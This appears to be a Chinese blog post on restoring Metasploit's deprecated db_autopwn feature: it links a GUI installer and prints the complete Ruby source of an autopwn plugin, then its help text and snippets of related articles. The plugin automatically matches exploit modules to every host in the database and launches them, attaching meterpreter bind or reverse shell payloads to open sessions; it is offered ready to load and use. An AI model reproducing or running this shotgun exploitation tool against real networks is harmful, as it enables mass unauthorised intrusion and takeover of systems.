0x01 最新版的metasploit没了图形化界面,
armitage开始收费
那我们就选用msfgui吧,安装简单
https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe
下载安装就可以了
0x02 以前有的db_autopwn,新版也取消了。只能自己下一个,然后load进去就可以用了,默认路径在\metasploit\apps\pro\msf3\plugins 这里。
module Msf module Ui module Console module CommandDispatcher class Plugin::AutoPWN < Msf::Plugin # # The plugin description for Msf::Plugin # def desc "DB AutoPWN" end # # The dispatcher's name. # def name "DB AutoPWN" end def initialize(framework, opts) super add_console_dispatcher(AutoPWN) end class AutoPWN require 'tempfile' include Msf::Ui::Console::CommandDispatcher # # Constants # PWN_SHOW = 2**0 PWN_XREF = 2**1 PWN_PORT = 2**2 PWN_EXPL = 2**3 PWN_SING = 2**4 PWN_SLNT = 2**5 PWN_VERB = 2**6 # # The dispatcher's name. # def name "DB AutoPWN" end # # Returns the hash of commands supported by this dispatcher. # def commands # Always include commands that only make sense when connected. # This avoids the problem of them disappearing unexpectedly if the # database dies or times out. See #1923 base = { "db_autopwn" => "Automatically exploit everything", } end # # Returns true if the db is connected, prints an error and returns # false if not. # # All commands that require an active database should call this before # doing anything. # def active? if not framework.db.active print_error("Database not connected") return false end true end # # A shotgun approach to network-wide exploitation # Officially deprecated as of 4.1 # # Forked for those who still want it and understand it's limitations/issues # def cmd_db_autopwn(*args) return unless active? print_error("") print_error("Warning: The db_autopwn command is not officially supported and exists only in a branch.") print_error(" This code is not well maintained, crashes systems, and crashes itself.") print_error(" Use only if you understand it's current limitations/issues.") print_error(" ISSUES/REQUESTS SHOULD GO TO NEINWECHTER VIA GITHUB") print_error("") stamp = Time.now.to_f vcnt = 0 rcnt = 0 mode = 0 code = :bind mjob = 5 regx = nil minrank = nil maxtime = 120 port_inc = [] port_exc = [] targ_inc = [] targ_exc = [] args.push("-h") if args.length == 0 while (arg = args.shift) case arg when '-t' mode |= PWN_SHOW when '-x' mode |= PWN_XREF when '-p' mode |= PWN_PORT when '-e' mode |= PWN_EXPL when '-s' mode |= PWN_SING when '-q' mode |= PWN_SLNT when '-v' mode |= PWN_VERB when '-j' mjob = args.shift.to_i when '-r' code = :conn when '-b' code = :bind when '-I' tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ]) range = args.shift if not tmpopt.valid?(range) print_error("Invalid range for -I") return end targ_inc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range)) when '-X' tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ]) range = args.shift if not tmpopt.valid?(range) print_error("Invalid range for -X") return end targ_exc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range)) when '-PI' port_inc = Rex::Socket.portspec_to_portlist(args.shift) when '-PX' port_exc = Rex::Socket.portspec_to_portlist(args.shift) when '-m' regx = args.shift when '-R' minrank = args.shift when '-T' maxtime = args.shift.to_f when '-h','--help' print_status("Usage: db_autopwn [options]") print_line("\t-h Display this help text") print_line("\t-t Show all matching exploit modules") print_line("\t-x Select modules based on vulnerability references") print_line("\t-p Select modules based on open ports") print_line("\t-e Launch exploits against all matched targets") # print_line("\t-s Only obtain a single shell per target system (NON-FUNCTIONAL)") print_line("\t-r Use a reverse connect shell") print_line("\t-b Use a bind shell on a random port (default)") print_line("\t-q Disable exploit module output") print_line("\t-R [rank] Only run modules with a minimal rank") print_line("\t-I [range] Only exploit hosts inside this range") print_line("\t-X [range] Always exclude hosts inside this range") print_line("\t-PI [range] Only exploit hosts with these ports open") print_line("\t-PX [range] Always exclude hosts with these ports open") print_line("\t-m [regex] Only run modules whose name matches the regex") print_line("\t-T [secs] Maximum runtime for any exploit in seconds") print_line("") return end end minrank = minrank || framework.datastore['MinimumRank'] || 'manual' if ! RankingName.values.include?(minrank) print_error("MinimumRank invalid! Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})") wlog("MinimumRank invalid, ignoring", 'core', LEV_0) return else minrank = RankingName.invert[minrank] end # Default to quiet mode if (mode & PWN_VERB == 0) mode |= PWN_SLNT end matches = {} refmatches = {} # Pre-allocate a list of references and ports for all exploits mrefs = {} mports = {} mservs = {} # A list of jobs we spawned and need to wait for autopwn_jobs = [] [ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype| mtype[0].each_module do |modname, mod| o = mod.new if(mode & PWN_XREF != 0) o.references.each do |r| next if r.ctx_id == 'URL' ref = r.ctx_id + "-" + r.ctx_val ref.upcase! mrefs[ref] ||= {} mrefs[ref][o.fullname] = o end end if(mode & PWN_PORT != 0) if(o.datastore['RPORT']) rport = o.datastore['RPORT'] mports[rport.to_i] ||= {} mports[rport.to_i][o.fullname] = o end if(o.respond_to?('autofilter_ports')) o.autofilter_ports.each do |rport| mports[rport.to_i] ||= {} mports[rport.to_i][o.fullname] = o end end if(o.respond_to?('autofilter_services')) o.autofilter_services.each do |serv| mservs[serv] ||= {} mservs[serv][o.fullname] = o end end end end end begin framework.db.hosts.each do |host| xhost = host.address next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost)) next if (targ_exc.length > 0 and range_include?(targ_exc, xhost)) if(mode & PWN_VERB != 0) print_status("Scanning #{xhost} for matching exploit modules...") end # # Match based on vulnerability references # if (mode & PWN_XREF != 0) host.vulns.each do |vuln| # Faster to handle these here serv = vuln.service xport = xprot = nil if(serv) xport = serv.port xprot = serv.proto end vuln.refs.each do |ref| mods = mrefs[ref.name.upcase] || {} mods.each_key do |modname| mod = mods[modname] next if minrank and minrank > mod.rank next if (regx and mod.fullname !~ /#{regx}/) if(xport) next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i)) next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i)) else if(mod.datastore['RPORT']) next if (port_inc.length > 0 and not port_inc.include?(mod.datastore['RPORT'].to_i)) next if (port_exc.length > 0 and port_exc.include?(mod.datastore['RPORT'].to_i)) end end next if (regx and mod.fullname !~ /#{regx}/) mod.datastore['RPORT'] = xport if xport mod.datastore['RHOST'] = xhost filtered = false begin ::Timeout.timeout(2, ::RuntimeError) do filtered = true if not mod.autofilter() end rescue ::Interrupt raise $! rescue ::Timeout::Error filtered = true rescue ::Exception filtered = true end next if filtered matches[[xport,xprot,xhost,mod.fullname]]=true refmatches[[xport,xprot,xhost,mod.fullname]] ||= [] refmatches[[xport,xprot,xhost,mod.fullname]] << ref.name end end end end # # Match based on open ports # if (mode & PWN_PORT != 0) host.services.each do |serv| next if not serv.host next if (serv.state != ServiceState::Open) xport = serv.port.to_i xprot = serv.proto xname = serv.name next if xport == 0 next if (port_inc.length > 0 and not port_inc.include?(xport)) next if (port_exc.length > 0 and port_exc.include?(xport)) mods = mports[xport.to_i] || {} mods.each_key do |modname| mod = mods[modname] next if minrank and minrank > mod.rank next if (regx and mod.fullname !~ /#{regx}/) mod.datastore['RPORT'] = xport mod.datastore['RHOST'] = xhost filtered = false begin ::Timeout.timeout(2, ::RuntimeError) do filtered = true if not mod.autofilter() end rescue ::Interrupt raise $! rescue ::Exception filtered = true end next if filtered matches[[xport,xprot,xhost,mod.fullname]]=true end mods = mservs[xname] || {} mods.each_key do |modname| mod = mods[modname] next if minrank and minrank > mod.rank next if (regx and mod.fullname !~ /#{regx}/) mod.datastore['RPORT'] = xport mod.datastore['RHOST'] = xhost filtered = false begin ::Timeout.timeout(2, ::RuntimeError) do filtered = true if not mod.autofilter() end rescue ::Interrupt raise $! rescue ::Exception filtered = true end next if filtered matches[[xport,xprot,xhost,mod.fullname]]=true end end end end rescue ::Exception => e print_status("ERROR: #{e.class} #{e} #{e.backtrace}") return end if (mode & PWN_SHOW != 0) print_status("Analysis completed in #{(Time.now.to_f - stamp).to_i} seconds (#{vcnt} vulns / #{rcnt} refs)") print_status("") print_status("=" * 80) print_status(" " * 28 + "Matching Exploit Modules") print_status("=" * 80) matches.each_key do |xref| mod = nil if ((mod = framework.modules.create(xref[3])) == nil) print_status("Failed to initialize #{xref[3]}") next end if (mode & PWN_SHOW != 0) tport = xref[0] || mod.datastore['RPORT'] if(refmatches[xref]) print_status(" #{xref[2]}:#{tport} #{xref[3]} (#{refmatches[xref].join(", ")})") else print_status(" #{xref[2]}:#{tport} #{xref[3]} (port match)") end end end print_status("=" * 80) print_status("") print_status("") end ilog("db_autopwn: Matched #{matches.length} modules") idx = 0 matches.each_key do |xref| idx += 1 begin mod = nil if ((mod = framework.modules.create(xref[3])) == nil) print_status("Failed to initialize #{xref[3]}") next end # # The code is just a proof-of-concept and will be expanded in the future # if (mode & PWN_EXPL != 0) mod.datastore['RHOST'] = xref[2] if(xref[0]) mod.datastore['RPORT'] = xref[0].to_s end if (code == :bind) mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s if(mod.fullname =~ /\/windows\//) mod.datastore['PAYLOAD'] = 'windows/meterpreter/bind_tcp' else mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp' end end if (code == :conn) mod.datastore['LHOST'] = Rex::Socket.source_address(xref[2]) mod.datastore['LPORT'] = (rand(0x8fff) + 4000).to_s if (mod.datastore['LHOST'] == '127.0.0.1') print_status("Failed to determine listener address for target #{xref[2]}...") next end if(mod.fullname =~ /\/windows\//) mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp' else mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp' end end if(framework.jobs.keys.length >= mjob) print_status("Job limit reached, waiting on modules to finish...") while(framework.jobs.keys.length >= mjob) ::IO.select(nil, nil, nil, 0.25) end end print_status("(#{idx}/#{matches.length} [#{framework.sessions.length} sessions]): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...") autopwn_jobs << framework.threads.spawn("AutoPwnJob#{xref[3]}", false, mod) do |xmod| begin stime = Time.now.to_f ::Timeout.timeout(maxtime) do inp = (mode & PWN_SLNT != 0) ? nil : driver.input out = (mode & PWN_SLNT != 0) ? nil : driver.output case xmod.type when MODULE_EXPLOIT xmod.exploit_simple( 'Payload' => xmod.datastore['PAYLOAD'], 'LocalInput' => inp, 'LocalOutput' => out, 'RunAsJob' => false) when MODULE_AUX xmod.run_simple( 'LocalInput' => inp, 'LocalOutput' => out, 'RunAsJob' => false) end end rescue ::Timeout::Error print_status(" >> autopwn module timeout from #{xmod.fullname} after #{Time.now.to_f - stime} seconds") rescue ::Exception print_status(" >> autopwn exception during launch from #{xmod.fullname}: #{$!} ") end end end rescue ::Interrupt raise $! rescue ::Exception print_status(" >> autopwn exception from #{xref[3]}: #{$!} #{$!.backtrace}") end end # Wait on all the jobs we just spawned while (not autopwn_jobs.empty?) # All running jobs are stored in framework.jobs. If it's # not in this list, it must have completed. autopwn_jobs.delete_if { |j| not j.alive? } print_status("(#{matches.length}/#{matches.length} [#{framework.sessions.length} sessions]): Waiting on #{autopwn_jobs.length} launched modules to finish execution...") ::IO.select(nil, nil, nil, 5.0) end if (mode & PWN_SHOW != 0 and mode & PWN_EXPL != 0) print_status("The autopwn command has completed with #{framework.sessions.length} sessions") if(framework.sessions.length > 0) print_status("Enter sessions -i [ID] to interact with a given session ID") print_status("") print_status("=" * 80) driver.run_single("sessions -l -v") print_status("=" * 80) end end print_line("") # EOM end end end end end end end
常见帮住
写道
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] ISSUES/REQUESTS SHOULD GO TO NEINWECHTER VIA GITHUB
[-]
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] ISSUES/REQUESTS SHOULD GO TO NEINWECHTER VIA GITHUB
[-]
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
相关推荐
metasploit自动化渗透攻击模块db_autopwn
Metasploit的功能十分强大,它不仅提供了控制台命令行界面(msfconsole),还支持脚本和GUI界面。 在Metasploit框架中,“Exploit Learning Tree”文档介绍了如何深入理解和使用Metasploit,它不仅向用户展示了如何...
【毒蛇:Metasploit-Framework图形界面图形化内网渗透工具】 毒蛇,全称为Viper,是一款基于Python开发的Metasploit-Framework的图形界面工具,它为红队和安全研究人员提供了一个友好的界面,用于管理和执行渗透...
在自动化过程中,可能还会涉及到创建自定义模块,使用工作流管理工具(如Rake或Ansible)来协调任务,甚至编写脚本自动化整个渗透测试过程。这需要对Ruby编程和Metasploit API有深入理解。 标签"Shell"表明本文主要...
**RapidPayload** 是一个基于 **Metasploit Framework** 的工具,它提供了一个简洁的图形用户界面(GUI),使得在渗透测试和安全研究过程中创建和管理有效载荷变得更加直观和高效。Metasploit Framework 是一个广泛...
Metasploit是一款强大的渗透测试工具,其核心在于Exploit框架,可以有效地帮助网络安全专业人员发现、分析和利用系统漏洞。"pitchw9a"可能指的是一个特定的漏洞或exploit模块,它可能是Metasploit框架中的一个重要...
Metasploit 使用教程汇编 ...Metasploit 是一个功能强大的渗透测试工具包,提供了一个强大的框架,用于自动化渗透测试和漏洞利用。通过学习 Metasploit 的使用教程,我们可以更好地理解 Metasploit 的使用方法和原理。
Metasploit Framework(MSF)允许用户以多种方式使用框架,包括图形用户界面(GUI)、控制台界面(console)、命令行界面(CLI),但不支持WEB模式。 搭建Metasploit环境有Windows和Linux两种平台的安装方式。在...
Armitage是一个图形化的界面,简化了Metasploit的操作,特别适合初学者。它提供了一种网络地图视图,清晰展示主机关系,便于管理和组织攻击。 1. **快速攻击**:Armitage提供了预定义的攻击链路,点击即可启动整个...
4. **易于使用的图形界面**:除了命令行界面之外,MetaSploit还提供了图形界面版本Armitage,使得非专业技术人员也能轻松上手。 5. **社区支持**:拥有活跃的开发者和用户社区,不断贡献新的模块和改进意见,确保...
8. **自动化与脚本编写**:Metasploit支持Ruby语言,用户可以通过编写脚本来自动化渗透测试过程,提高效率。 9. **防御策略**:书中也会介绍如何利用Metasploit来模拟攻击,从而测试并强化自己的防御体系,找出安全...
7. **自动化与脚本**:Metasploit支持自定义脚本和模块,以实现自动化渗透测试流程。教程将解释如何编写和使用Ruby脚本来扩展Metasploit的功能。 8. **防御与安全建议**:除了攻击,教程也会讨论如何防范Metasploit...
Metasploit框架中,所有的渗透测试数据和会话状态都被序列化存储,以便于持久化和恢复。 Metasploit的用户界面(Framework UI)部分则可能涉及到如何与Metasploit的控制台或图形用户界面(GUI)进行交互,以便于...
7. **自动化脚本**:Metasploit支持Ruby编程语言,允许用户编写自定义脚本来自动化渗透测试流程。 8. **社区支持**:作为开源项目,Metasploit拥有庞大的开发者和用户社区,不断更新和改进工具,提供最新的安全信息...
- **自动化与定制化**:除了提供现成的exploit模块外,MSF还支持高度定制化的攻击方案,允许用户根据具体需求构建独特的攻击策略。 - **易用性**:MSF界面友好,无论是通过命令行还是图形界面(如Armitage),都能够...
- **API 和集成**:可能改进了与外部工具(如Nmap、Burp Suite等)的集成,增强自动化渗透测试的能力。 - **用户体验**:界面和命令行可能有改进,提供更友好的交互体验。 3. **Metasploit Framework 的使用** -...
此外,本书还会指导读者如何将Nmap、NeXpose和Nessus等工具与Metasploit集成,实现自动化的漏洞发现过程。Meterpreter是一个高级的shell,可以用来从网络内部发起进一步攻击。书中还探讨了如何利用Metasploit的各种...
- 模糊测试是一种自动化或半自动化的技术,通过向目标系统发送大量无效、随机或意外的数据,旨在触发未预见的程序行为,从而发现潜在的安全漏洞。在本案例中,模糊测试用于确定能够触发缓冲区溢出的具体输入量。 2...